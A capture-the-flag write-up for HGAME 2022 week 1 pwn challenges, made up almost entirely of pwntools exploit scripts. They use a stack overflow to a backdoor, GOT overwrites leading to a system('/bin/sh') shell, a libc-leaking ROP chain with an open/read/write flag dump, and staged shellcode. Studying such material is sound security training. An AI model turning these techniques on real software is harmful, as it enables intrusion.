2022-hgame-week1

hgame week1-pwn wp

test_nc

直接nc即可。

easy_overflow

#!/usr/bin/python
#encoding:utf-8

from pwn import *

context.arch = 'amd64'
context.log_level = 'debug'

fn = './vuln'
elf = ELF(fn)
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')

debug = 0
if debug:
    p = remote('week-1.hgame.lwsec.cn', 30487)

else:
    p = process(fn)


backdoor = 0x40117E

payload = b'a' * 0x18 + p64(backdoor)
p.sendline(payload)

p.sendline('exec 1>&2')

p.interactive()

choose_the_seat

覆盖exit_got为main，泄漏puts地址，最后覆盖puts_got为system。

#!/usr/bin/python
#encoding:utf-8

from pwn import *

context.arch = 'amd64'
context.log_level = 'debug'

fn = './vuln'
elf = ELF(fn)
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')

debug = 0
if debug:
    p = remote('week-1.hgame.lwsec.cn', 31094)

else:
    p = process(fn)


main = 0x4012d1
exit_plt = 0x4010e0

p.recvuntil('please choose one.')
p.sendline('-6')

p.recvuntil('input your name')
payload = p64(main) + p64(0)
p.send(payload)

p.recvuntil('please choose one.')
p.sendline('-9')

p.recvuntil('input your name')
p.send(b'a' * 8)

puts = u64(p.recvuntil('\x7f')[-6:].ljust(8, b'\x00'))
log.success('puts: ' + hex(puts))

libc_base = puts - libc.sym['puts']
log.success('libc_base: ' + hex(libc_base))

system = libc_base + libc.sym['system']

p.recvuntil('please choose one.')
p.sendline('-9')

p.recvuntil('input your name')
p.send(b'/bin/sh\x00' + p64(system))

p.interactive()

orw

控制rbp或者rax即可实现对rsi的控制，进而read任一地址。

#!/usr/bin/python
#encoding:utf-8

from pwn import *

context.arch = 'amd64'
context.log_level = 'debug'

fn = './vuln'
elf = ELF(fn)
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')

debug = 0
if debug:
    p = remote('week-1.hgame.lwsec.cn', 32124)

else:
    p = process(fn)


puts_plt = elf.plt['puts']
puts_got = elf.got['puts']

read = 0x4012d6
main = 0x4012f0

pop_rdi_ret = 0x401393
leave_ret = 0x4012be
data = 0x404100

p.recvuntil('before you try to solve this task.')

payload = b'a' * 0x108 + p64(pop_rdi_ret) + p64(puts_got) + p64(puts_plt) + p64(main)
p.send(payload)

puts = u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
log.success('puts: ' + hex(puts))

libc_base = puts - libc.sym['puts']
log.success('libc_base: ' + hex(libc_base))

pop_rax_ret = libc_base + 0x36174
pop_rsi_ret = libc_base + 0x2601f
pop_rdx_ret = libc_base + 0x142c92
syscall_ret = libc_base + 0x630a9

# gdb.attach(p)
# pause()

p.recvuntil('before you try to solve this task.')
payload = b'a' * 0x100 + p64(data) + p64(pop_rax_ret) + p64(data) + p64(read) + p64(leave_ret) + p64(0)
p.send(payload)

rop_data = [
    pop_rax_ret,  # sys_open('flag', 0)
    2,
    pop_rdi_ret,
    data,
    pop_rsi_ret,
    0,
    syscall_ret,

    pop_rax_ret,  # sys_read(flag_fd, heap, 0x100)
    0,
    pop_rdi_ret,
    3,
    pop_rsi_ret,
    data + 0x100,
    pop_rdx_ret,
    0x100,
    syscall_ret,

    pop_rax_ret,  # sys_write(1, heap, 0x100)
    1,
    pop_rdi_ret,
    1,
    pop_rsi_ret,
    data + 0x100,
    syscall_ret
]

payload = b'flag\x00\x00\x00\x00' + flat(rop_data)
p.sendline(payload)

p.interactive()

simple_shellcode

#!/usr/bin/python
#encoding:utf-8

from pwn import *

context.arch = 'amd64'
context.log_level = 'debug'

fn = './vuln'
elf = ELF(fn)
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')

debug = 0
if debug:
    p = remote('week-1.hgame.lwsec.cn', 32737)

else:
    p = process(fn)

p.recvuntil('your shellcode:')

p1 = '''
    nop
    xor rdi, rdi
    xor rsi, rsi
    mov esi, 0xCAFE0100
    push rsi
    syscall
    ret
'''
print(len(asm(p1)))
p.send(asm(p1))

p2 = asm(shellcraft.cat('flag'))
p.sendline(p2)

p.interactive()